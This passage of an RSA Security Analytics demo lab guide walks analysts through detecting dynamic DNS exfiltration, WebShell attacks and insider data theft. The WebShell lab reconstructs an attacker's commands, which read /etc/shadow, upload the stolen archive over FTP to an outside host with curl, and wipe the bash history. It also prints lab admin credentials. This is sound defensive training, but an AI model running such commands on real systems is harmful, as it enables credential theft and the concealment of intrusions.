2. Choose View All Schedules

RSA Security Analytics 10.5 - Demo v11.1

Page 76

RSA Security Analytics 10.5 - Demo v11.1

4.3 Start the Report


1. Choose the Dynamic DNS A... report
2. Click the gear menu and chose Start

4.4 View the Report


1. When the report State is Completed, click View. The report should complete in 5 seconds or
less.
2. If the State does not refresh in a timely manner, force the screen refresh by clicking the arrow at
the bottom of the screen.

RSA Security Analytics 10.5 - Demo v11.1

Page 77

RSA Security Analytics 10.5 - Demo v11.1

4.5 Last Chart in the Report


From this report, the analyst can prioritize and drill in to the most interesting data points to investigate
further. In this particular report, the analyst focuses in on data uploads to dynamic DNS domains from
critical servers (which should never happen in this environment).
1. Use the scroll bar to go to the last chart in the report.
2. Click on the bar
3. Click on Investigate

RSA Security Analytics 10.5 - Demo v11.1

Page 78

RSA Security Analytics 10.5 - Demo v11.1

Step 5 Investigation
Choose the appropriate meta group by
1. Click on the menu next to Profile
2. Choose Use Meta Group
3. Choose DynDNS

RSA Security Analytics 10.5 - Demo v11.1

Page 79

RSA Security Analytics 10.5 - Demo v11.1

5.1 Drill Down


Directly from the report, the analyst can drill down to gain insight into the specific sessions.

RSA Security Analytics 10.5 - Demo v11.1

Page 80

RSA Security Analytics 10.5 - Demo v11.1

Step 6 Reconstructing the Network Session


This looks suspicious enough on its own, but by drilling once more, the analyst can see the
reconstructed network session, and in turn extract any files that had left the environment.
1. Click on the green number next to dynamic dns domain

6.1 View Details


If Detail View is not visible, perform the following actions. Otherwise, continue to step 6.2.
1. Click the menu icon for the item next Profile.
2. Click Detail View

RSA Security Analytics 10.5 - Demo v11.1

Page 81

RSA Security Analytics 10.5 - Demo v11.1

6.2 View Details


1. Click on View Details

RSA Security Analytics 10.5 - Demo v11.1

Page 82

RSA Security Analytics 10.5 - Demo v11.1

6.2 View the Files


1. Click Best Reconstruction
2. Click View Files

RSA Security Analytics 10.5 - Demo v11.1

Page 83

RSA Security Analytics 10.5 - Demo v11.1

6.3 Files List


This looks suspicious enough on its own, but by drilling once more, the analyst can see the
reconstructed network session, and in turn extract any files that had left the environment.

RSA Security Analytics 10.5 - Demo v11.1

Page 84

RSA Security Analytics 10.5 - Demo v11.1

Step 7 Extract the Archive to see the Business Impact


Going one step further, the analyst can download and extract the archive and see the actual company
information that has left the environment, and, understanding the business impact can now take the
proper steps to handle the incident further
1. Right-click on M_schematic.png
2. Click Save link as...

RSA Security Analytics 10.5 - Demo v11.1

Page 85

RSA Security Analytics 10.5 - Demo v11.1

7.1 File name


1. Click Save as type: and choose All Files
2. Click Save

RSA Security Analytics 10.5 - Demo v11.1

Page 86

RSA Security Analytics 10.5 - Demo v11.1

7.2 Downloads
Navigate to the Downloads directory
1. Right-click on M-schematic.png.tmp
2. Click Open with...

RSA Security Analytics 10.5 - Demo v11.1

Page 87

RSA Security Analytics 10.5 - Demo v11.1

7.3 Examine the file


Click More options
1. Click Paint
Choose Open when prompted

RSA Security Analytics 10.5 - Demo v11.1

Page 88

RSA Security Analytics 10.5 - Demo v11.1

7.4 Extracted File


Upon extracting the file, it will be possible to see what data was exfiltrated.

RSA Security Analytics 10.5 - Demo v11.1

Page 89

RSA Security Analytics 10.5 - Demo v11.1

Lab 4 - WebShell Attacks - How to Detect and Respond


What is a WebShell?
A WebShell is a piece of code or a script running on a server that enables remote administration. While
often used for legitimate administration purposes, it is also a favorite tactic used by malicious actors in
order to gain remote control of internet facing web servers. Once interaction with a WebShell is
established, an attacker is free to act on any number of objectives such as service disruption, increasing
foothold, and data exfiltration.

RSA Security Analytics 10.5 - Demo v11.1

Page 90

RSA Security Analytics 10.5 - Demo v11.1

A Typical Attack Scenario


A common method of execution for this attack leverages vulnerabilities in a website (eg. SQL Injection,
Remote File Inclusion) to remotely generate or install a file that will act as a WebShell. Once the
WebShell is successfully installed, the remote attacker may then craft an HTTP POST request directly
to the WebShell with embedded commands that will be executed as if the attacker had local (shell)
access to the web server.

Detection and Response


Attackers that successfully use WebShells take advantage of the fact that many organizations do not
have complete visibility into HTTP sessions. Traditional tools rely on signatures and are easily left blind
by intentional obfuscation of payloads and commands. In order to effectively respond to WebShell
attacks, defenders must maximize visibility into each stage of the attack lifecycle. The following chart
contrasts the visibility by attack stage into an attackers tools, tactics, and procedures (TTPs) provided
by traditional tools with RSA Security Analytics.

RSA Security Analytics 10.5 - Demo v11.1

Page 91

RSA Security Analytics 10.5 - Demo v11.1

Without being able to reconstruct the entire HTTP session (request and response), traditional toolsets
do not allow an investigator to see into enough of the attack lifecycle to understand the initial attack
vector (Delivery, Exploit/Installation), what an attacker is doing (C2), and what the impact to the
business is (Action). For example, a traditional logs-only SIEM has no way to alert on suspicious HTTP
sessions of this nature unless a downstream signature-based tool such as an IDS/IPS or web proxy has
seen the exact attack before. Furthermore, HTTP sessions cannot be reconstructed with log data alone,
meaning a complete lack of visibility into C2 commands, data exfiltration, and initial entry vector.

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


To capture fresh data, first double-click on the mRemoteNG icon on the desktop.

RSA Security Analytics 10.5 - Demo v11.1

Page 92

RSA Security Analytics 10.5 - Demo v11.1

2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.

2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.

RSA Security Analytics 10.5 - Demo v11.1

Page 93

RSA Security Analytics 10.5 - Demo v11.1

2.3 Copy the command from the Desktop file


Highlight the command line under Web Shell Demo and choose Copy or Ctrl+C

RSA Security Analytics 10.5 - Demo v11.1

Page 94

RSA Security Analytics 10.5 - Demo v11.1

2.4 Paste the command in the Console


1. Paste the command into the console and press enter.
2. The command will begin to run.
3. Wait for it to complete

Step 3 Connect to the Security Analytics User Interface


Click on the the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If is does not, choose the RSA Security Analytics
bookmark from the toolbar.

RSA Security Analytics 10.5 - Demo v11.1

Page 95

RSA Security Analytics 10.5 - Demo v11.1

3.1 Warning screen for Chrome


If Chrome is chosen, the Your connection is not private warning may be displayed.
Click Advanced.

RSA Security Analytics 10.5 - Demo v11.1

Page 96

RSA Security Analytics 10.5 - Demo v11.1

3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)

RSA Security Analytics 10.5 - Demo v11.1

Page 97

RSA Security Analytics 10.5 - Demo v11.1

3.3 Enter the user credentials


Username = admin
Password = Password123!

Step 4 WebShell Visibility with RSA Security Analytics for


Packets
Detecting possible WebShell activity involves understanding what an HTTP session with an embedded
command typically looks like. There are a few notable features often seen with this attack:
Request sent directly to a web server with the HTTP POST method to send data without
populating commands in the URL string: This method ensures typical web access logs do not
include the command (vs. HTTP GET which would include the commands within the URL)
No HTTP GET will have been seen before the POST (Normal human-based web traffic would
have seen a GET before a POST is issued)
(Usually) No Referrer header since the request is sent directly to the server and is not a result of
click-through browsing
Posted data includes obfuscated shell commands to be executed by the WebShell

RSA Security Analytics 10.5 - Demo v11.1

Page 98

RSA Security Analytics 10.5 - Demo v11.1

5.1 Investigation
1. Click Investigation
2. Click Navigate

5.2 Choose the Meta Group


Choose the appropriate meta group by
1. Click on the menu next to Profile
2. Choose Use Meta Group
3. Choose L2_Analyst

RSA Security Analytics 10.5 - Demo v11.1

Page 99

RSA Security Analytics 10.5 - Demo v11.1

5.3 Load Values


1. Click Load Values

5.4 Remove Visualization


If Visualization is displayed, remove it. Otherwise, continue with step 5.5.
1. Click Hide

RSA Security Analytics 10.5 - Demo v11.1

Page 100

RSA Security Analytics 10.5 - Demo v11.1

5.5 Drill Down


By reconstructing the entire HTTP session upon capture and immediately generating and extracting rich
metadata, RSA Security Analytics makes it simple to alert on the features indicative of a WebShell
1. Click on the green number next to http post no get no referrer - possible webshell

Step 6 Investigate Sessions


1. Click on the menu to the left of Actions (Detail View)
2. Click on Custom Column Groups
3. Click on WebShellDemo

RSA Security Analytics 10.5 - Demo v11.1

Page 101

RSA Security Analytics 10.5 - Demo v11.1

6.1 WebShell Sessions Detail


Once suspicious sessions are tagged, the analyst can open up the actual HTTP session(s) for deeper
inspection and quickly see all sessions exhibiting WebShell behavior:
1. Double-click the first event with Source IP Address 67.202.59.203 and Destination IP of
192.168.1.55

Step 7 Reconstructing the Raw Contents of the First Event


1. Click on the drop down icon next to Top to Bottom
2. Click on Side by Side

RSA Security Analytics 10.5 - Demo v11.1

Page 102

RSA Security Analytics 10.5 - Demo v11.1

7.1 View Text


1. Click on the drop down icon next to Best Reconstruction
2. Click on View Text

RSA Security Analytics 10.5 - Demo v11.1

Page 103

RSA Security Analytics 10.5 - Demo v11.1

7.2 View the Event Reconstruction


By clicking on each session, the analyst can dig deeper and reconstruct the raw contents.The first
session shows an HTTP POST request to default.php setting the variable q to a value of cat /etc/
passwd. The subsequent response from the HTTP server has actually returned the results of that
command, executed on the local system, to the attackers browser, displaying the raw contents of /etc/
passwd the list of users on the system!
1. Click the X in the upper right hand corner to close the Event Reconstruction window.

Step 8 Reconstructing the Raw Contents of the Second Event


By iterating through and viewing each of the sessions, the analyst quickly discovers the entire command
sequence sent to the WebShell by the attacker.

RSA Security Analytics 10.5 - Demo v11.1

Page 104

RSA Security Analytics 10.5 - Demo v11.1

1. Double-click the second event with Source IP Address 67.202.59.203 and Destination IP of
192.168.1.55

8.1 View Text


1. Click on the drop down icon next to Best Reconstruction
2. Click on View Text

8.2 View the Files


This quick reconstruction shows the following commands executed in sequence:
cat /etc/shadow > shadow.txt

RSA Security Analytics 10.5 - Demo v11.1

Page 105

RSA Security Analytics 10.5 - Demo v11.1

sudo zip --password Password!1 loot.zip shadow.txt loot.txt


rm shadow.txt
rm passwd.txt
curl T loot.zip ftp://169.122.8.212 user chuck:Norris
rm loot.zip
cat /dev/null > ~/.bash_history
Full session visibility has shown the analyst that the attacker copied the contents of /etc/shadow
(encrypted passwords for all local users of the system) along with another text file into an encrypted
archive (loot.zip), proceeded to upload the small file to a host listening on 169.122.8.212 over port 80,
and finally attempted to cover their tracks by removing all files and clearing the command history. A
brute force attack could be used to extract credentials that could then be used to continue the attack,
gaining a stronger foothold in the environment through lateral movement.
1. Click the X in the upper right hand corner to close the Event Reconstruction window.

RSA Security Analytics 10.5 - Demo v11.1

Page 106

RSA Security Analytics 10.5 - Demo v11.1

Step 9 Focusing the Investigation on the External Drop Zone


Continuing the investigation, the analyst can re-focus on the external drop zone at 67.202.59.203. A
quick query into RSA Security Analytics reveals the FTP session the analyst saw evidence of in the
WebShell commands.
1. Click the menu icon next to alert = 'http post no get no referrer...'

RSA Security Analytics 10.5 - Demo v11.1

Page 107

RSA Security Analytics 10.5 - Demo v11.1

2. Click Remove

9.1 Request All Activities Involving a Destination of 67.202.59.203


1. Click Query
2. Enter ip.dst in the first text box (Select Meta)
3. Choose = for the second text box (Operator)
4. Type 67.202.59.203 in the third text box (Value)
5. Click Apply

9.2 Events Related to the Drop Zone


RSA Security Analytics detects this as an FTP session regardless of any special ports used by an
attacker to help evade detection.

RSA Security Analytics 10.5 - Demo v11.1

Page 108

RSA Security Analytics 10.5 - Demo v11.1

1. Double-click on the event with Network Protocol FTP

Step 10 Reconstructed FTP Session Between Victim Server and


Drop Zone
1. Click on Best Reconstruction
2. Click on View Text

RSA Security Analytics 10.5 - Demo v11.1

Page 109

RSA Security Analytics 10.5 - Demo v11.1

10.1 Extracting loot.zip


Drilling in further, it is possible for the analyst to confirm the data exfiltration by extracting the actual
archive, and decrypting it with the password that was learned earlier on in the investigation, gaining
insight into the potential impact to the business.
1. Click the X in the upper right hand corner to close the Event Reconstruction window.

RSA Security Analytics 10.5 - Demo v11.1

Page 110

RSA Security Analytics 10.5 - Demo v11.1

Step 11 Understanding How the WebShell was Installed


Finally, the analyst can rewind the events in order to try and understand how the WebShell was installed
in the first place. By looking at all traffic originating from the attackers IP address prior to the detected
WebShell activity, the analyst can reconstruct and see the initial SQL injection attack that resulted in the
upload of the shell to the web server.

RSA Security Analytics 10.5 - Demo v11.1

Page 111

RSA Security Analytics 10.5 - Demo v11.1

1. Click the menu icon next to ip.dst=67.202.59.203


2. Click Edit

11.1 Modifying the Query to Request HTTP Sessions Originating from the Attacker
IP Address Prior to the Alert
1. Change ip.dst to ip.src
2. Click OK

RSA Security Analytics 10.5 - Demo v11.1

Page 112

RSA Security Analytics 10.5 - Demo v11.1

11.2 All Events Involving a Source of 67.202.59.203


1. Double-click on the event that has the querystring

11.3 Reconstructing the Raw Contents of the First Event


1. Click on the drop down icon next to Side by Side
2. Click on Top to Bottom

RSA Security Analytics 10.5 - Demo v11.1

Page 113

RSA Security Analytics 10.5 - Demo v11.1

11.4 View Text


1. Click on the drop down icon next to Best Reconstruction
2. Click on View Text

RSA Security Analytics 10.5 - Demo v11.1

Page 114

RSA Security Analytics 10.5 - Demo v11.1

11.4 Examine the Querystring of the Event


Opening up the session reveals SQL commands within the querystring within the HTTP get session that
resulted in data (the WebShell) being copied to the web server. The analyst now has all the details they
need to understand the incident, the potential impact to the business, and the root cause for tightening
up defenses in the future.

RSA Security Analytics 10.5 - Demo v11.1

Page 115

RSA Security Analytics 10.5 - Demo v11.1

Lab 5 - Malicious Insider - How to Detect and Respond


Who is a Malicious Insider?
An organization has to protect its assets not only from external threat actors but also from malicious
insiders who may benefit from exfiltrating intellectual property or other sensitive data out of the company
they are working for.
Malicious insider activity is often different from external attackers since insiders already have a foothold
in the organization and often already have privileged access to companys resources.

RSA Security Analytics 10.5 - Demo v11.1

Page 116

RSA Security Analytics 10.5 - Demo v11.1

A Typical Attack Scenario


A motivated and intelligent insider such as a rogue administrator may attempt to exfiltrate data stealthily
by first transferring data to a part of the environment accessible from outside the organization and then
downloading it from the public internet disguised as a regular website visitor.This forgoes the risk of
detection of a large external file upload (i.e. to dropbox).
The insider may first leverage their existing privileges to collect sensitive data locally or from the
organizations cloud infrastructure followed by transferring it to a part of the environment accessible
from the internet like a web server. To prevent abuse of privileges, organizations usually implement
processes and procedures which requires users to submit change requests which have to be approved
before performing any critical action or change to the production environment, which of course the
insider must circumvent in this scenario.

RSA Security Analytics 10.5 - Demo v11.1

Page 117

RSA Security Analytics 10.5 - Demo v11.1

Detection and Response


Malicious Insiders usually take advantage of the fact that many organizations, despite the number of
security controls in place, do not have enough visibility into the transfer of information within an
organization, and lack the context required to distinguish between legitimate and malicious activities.
Most of the traditional detection tools that rely on signatures also assume a privileged user has to be
implicitly trusted. Being constantly overwhelmed by large volumes of security data, organizations are
often unable to take advantage of the processes already in place that are designed to prevent this kind
of malicious activities and link them with gathered data (e.g. checking if a change request has been
submitted and approved before allowing a potentially critical action such as file transfers and software
installation).
In order to prevent this and other similar scenarios, defenders must maximize visibility into each stage
of the attack lifecycle. The following chart contrasts the visibility by attack stage into an attackers tools,
tactics, and procedures (TTPs) provided by traditional tools versus RSA Security Analytics.
Without being able to collect information from different sources and reconstruct the entire
communication (request and response), traditional toolsets inhibit an investigator to not only identify the
malicious insider, but also to reconstruct the different steps required to understand the initial attack
vector (Reconnaissance), what an attacker is doing (Exploit/Installation), and what the impact to the
business is (Action). For example, a traditional logs-only SIEM has no way to reconstruct the
communication between the attacker and the critical web server and link it with the exfiltration phase
which follows just after, all of this correlated with the business context and the existing IT processes.

RSA Security Analytics 10.5 - Demo v11.1

Page 118

RSA Security Analytics 10.5 - Demo v11.1

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


To capture fresh data, first double-click on the mRemoteNG icon on the desktop.

2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.

RSA Security Analytics 10.5 - Demo v11.1

Page 119

RSA Security Analytics 10.5 - Demo v11.1

2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.

2.3 Copy the command from the Desktop file


Highlight the command line under Malicious Insider and choose Copy or Ctrl+C

RSA Security Analytics 10.5 - Demo v11.1

Page 120

RSA Security Analytics 10.5 - Demo v11.1

2.4 Paste the command in the Console


1. Paste the command into the console and press enter.
2. The command will begin to run.
3. Wait for it to complete

Step 3 Connect to the Security Analytics User Interface


Click on the the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If is does not, choose the RSA Security Analytics
bookmark from the toolbar.

3.1 Warning screen for Chrome


If Chrome is chosen, the Your connection is not private warning may be displayed. If

RSA Security Analytics 10.5 - Demo v11.1

Page 121

RSA Security Analytics 10.5 - Demo v11.1

Click Advanced.

RSA Security Analytics 10.5 - Demo v11.1

Page 122

RSA Security Analytics 10.5 - Demo v11.1

3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)

RSA Security Analytics 10.5 - Demo v11.1

Page 123

RSA Security Analytics 10.5 - Demo v11.1

3.3 Enter the user credentials


Username = admin
Password = Password123!

RSA Security Analytics 10.5 - Demo v11.1

Page 124

RSA Security Analytics 10.5 - Demo v11.1

Step 4 Alerting Module


Key solution: RSA Security Analytics for Packets, RSA Security Analytics for Logs
RSA Security Analytics allows real-time correlation of logs, Netflow, full packet capture and endpoint
events. As data is captured by the platform, significant metadata is extracted and alerts are generated
based on specific patterns to model anomalous or potentially malicious scenarios.
The network traffic collected at designated capture points tells the platform and its users what exactly
an insider is transferring around the organization, regardless of user privileges. Log data can be used
to keep track of the change request workflow allowing the correlation module of Security Analytics to
detect activities whose request has not been submitted nor approved. Additionally, enriching this data
with business context helps the analyst prioritize actions since high severity alerts will trigger only if a
critical server has been involved.

RSA Security Analytics 10.5 - Demo v11.1

Page 125

RSA Security Analytics 10.5 - Demo v11.1

4.1 Alerts
By accessing the alerting module of Security Analytics, an analyst is notified about a critical event which
has just happened. The rule behind this alert is specifically looking for a user that uploaded a file via
FTP to a critical server exposed to the Internet without submitting a change request first, which would in
effect be an internal policy violation. However, the alert has an elevated severity because it also implies
the same file being downloaded from an external website visitor shortly after.
1. Click Alerts
2. Click Summary

RSA Security Analytics 10.5 - Demo v11.1

Page 126

RSA Security Analytics 10.5 - Demo v11.1

4.2 Drill to Investigation


1. Double-click on Upload without change request followed by download

4.3 Drill to Investigation (continued)


1. Double-click on Upload without change request followed by download

RSA Security Analytics 10.5 - Demo v11.1

Page 127

RSA Security Analytics 10.5 - Demo v11.1

2. Double-click on the event containing the Source 192.168.0.7

Step 5 Investigation
Choose the appropriate meta group by
1. Click on the menu next to Profile

RSA Security Analytics 10.5 - Demo v11.1

Page 128

RSA Security Analytics 10.5 - Demo v11.1

2. Choose Use Meta Group


3. Choose Malicious_Insider

RSA Security Analytics 10.5 - Demo v11.1

Page 129

RSA Security Analytics 10.5 - Demo v11.1

5.1 Drill Down


Once the analyst reviewed the alert and determined a follow up investigation is required, they may
simply click on any metadata presented on the screen (e.g. the IP source of the user who uploaded the
file) to access the investigation module, exposing all log events and network traffic originating from the
users IP address within that timeframe.
The screen shows a few risk indicators (e.g. there is a critical server involved, the user is an
administrator and an encrypted archive has been transferred) as well as network traffic details (e.g. ftp
protocol has been used and the user mburns uploaded a file called CAD.zip). All of this data is
summarized in a single screen.

RSA Security Analytics 10.5 - Demo v11.1

Page 130

RSA Security Analytics 10.5 - Demo v11.1

Step 6 Reconstructing the Network Session


This looks suspicious enough on its own, but by drilling once more, the analyst can see the
reconstructed network session, and in turn extract any files that had left the environment.

RSA Security Analytics 10.5 - Demo v11.1

Page 131

RSA Security Analytics 10.5 - Demo v11.1

1. Click on the (1) next to cad.zip

6.1 Detail VIew


1. Click on the menu to the left of Actions
2. Choose Detail View

RSA Security Analytics 10.5 - Demo v11.1

Page 132

RSA Security Analytics 10.5 - Demo v11.1

6.2 View Details


1. Click on View Details

RSA Security Analytics 10.5 - Demo v11.1

Page 133

RSA Security Analytics 10.5 - Demo v11.1

6.3 View the Files


In order for the analyst to confirm the actual criticality of the incident, the communication can be
reconstructed and the user can extract the files from the FTP session to verify the sensitivity of the
content.
1. Click Best Reconstruction to see the reconstruction of the communication
By extracting the files from the session, the analyst is able to see that the content of the zip file is
53_bevel_gear_support_exercise.jpg.

RSA Security Analytics 10.5 - Demo v11.1

Page 134

RSA Security Analytics 10.5 - Demo v11.1

RSA Security Analytics 10.5 - Demo v11.1

Page 135

RSA Security Analytics 10.5 - Demo v11.1

Step 7 Broadening the Timeframe


Click the X in the upper right hand corner to close the Event Reconstruction window
1. Click Navigate From Here in the drop down list for ip.src='192.168.0.7'

7.1 Change Time Frame


1. Click Custom
2. Click All Data

RSA Security Analytics 10.5 - Demo v11.1

Page 136

RSA Security Analytics 10.5 - Demo v11.1

7.2 Combine Network Traffic and Logs into a Single View


By leveraging the same approach, the analyst can now gather additional information by broadening the
timeframe and looking for all the activities just before and after the event involving that specific user or
IP source.
They analyst may notice the user under investigation has performed a number of actions on different
systems, accessing multiple resources (with legitimate credentials since the user is an admin), both
locally and in the cloud.

RSA Security Analytics 10.5 - Demo v11.1

Page 137

RSA Security Analytics 10.5 - Demo v11.1

Step 8 Leveraging the Metadata Framework


1. Click on the icon for the drop-down menu for ip.src
2. Click Remove

8.1 Request All Activities Involving the cad.zip File


1. Scroll down and click on cad.zip under Filename

8.2 Data Visualization


1. Click Visualization

RSA Security Analytics 10.5 - Demo v11.1

Page 138

RSA Security Analytics 10.5 - Demo v11.1

8.3 Request All Activities Involving the cad.zip File


The metadata framework within Security Analytics can be leveraged to submit queries by combining
any of the metadata present. For example an analyst can now pivot and request details on all the
activities involving a file named CAD.zip which was the archive the insider uploaded to the web server.
The screen shows some HTTP activity in addition to the FTP session already investigated by the user.
This is expected, given the alert condition that presumes that file was downloaded from the public side
of the web server right after it was transferred there. Other risk indicators highlight other anomalies in
this request (e.g. there is a direct HTTP request without referrer which indicates the user that
downloaded the file knew where it was in advance without surfing the website. That is also anomalous).

RSA Security Analytics 10.5 - Demo v11.1

Page 139

RSA Security Analytics 10.5 - Demo v11.1

Step 9 Reconstructing the Network Session


The analyst can then reconstruct this network session and verify that the remote user successfully
downloaded the file.
1. Click on the (1) next to HTTP

9.1 View Details


1. Click on View Details

RSA Security Analytics 10.5 - Demo v11.1

Page 140

RSA Security Analytics 10.5 - Demo v11.1

9.2 View Text


1. Click on Best Reconstruction
2. Click on View Text

RSA Security Analytics 10.5 - Demo v11.1

Page 141

RSA Security Analytics 10.5 - Demo v11.1

9.3 Confirmation of Data Exfiltration


The analyst can then reconstruct this network session and verify that the remote user successfully
downloaded the file.
By conducting this quick and simple investigation, the analyst has confirmed a data exfiltration is in
place and can perform any follow up action which is required, having collected a large amount of
evidence against the administrator. RSA Security Analytics was able to automate the detection process
by alerting the analyst in real-time of an anomalous activity thanks to its pervasive visibility combined
with the business and IT context of all related systems.

RSA Security Analytics 10.5 - Demo v11.1

Page 142

RSA Security Analytics 10.5 - Demo v11.1

Troubleshooting

RSA Security Analytics 10.5 - Demo v11.1

Page 143

RSA Security Analytics 10.5 - Demo v11.1

General Troubleshooting and Tips

RSA Security Analytics 10.5 - Demo v11.1

Page 144

RSA Security Analytics 10.5 - Demo v11.1

RSA Security Analytics Troubleshooting & Tips


No Data Appears in the Investigation Window
If no data appears in the investigation window, first ensure that the Load Values button has been
clicked.

Check the Date Range


If no data appears once the Load Values button has been clicked, check the date range to ensure that
data has been captured in that time frame.

RSA Security Analytics 10.5 - Demo v11.1

Page 145

RSA Security Analytics 10.5 - Demo v11.1

Modify the Date Range


1. Choose the date range from the drop menu. All Data will show all data ever loaded to the
system.
2. Click the refresh button to see the data in that time range.

RSA Security Analytics 10.5 - Demo v11.1

Page 146

RSA Security Analytics 10.5 - Demo v11.1

Conclusion

RSA Security Analytics 10.5 - Demo v11.1

Page 147

RSA Security Analytics 10.5 - Demo v11.1

Conclusion
RSA Security Analytics offers organizations a unified platform for incident detection, investigations, and
advanced security analysis. This will allow their highly skilled security personnel to be more efficient
and less skilled security personnel to be more effective.

RSA Security Analytics 10.5 - Demo v11.1

Page 148

S-ar putea să vă placă și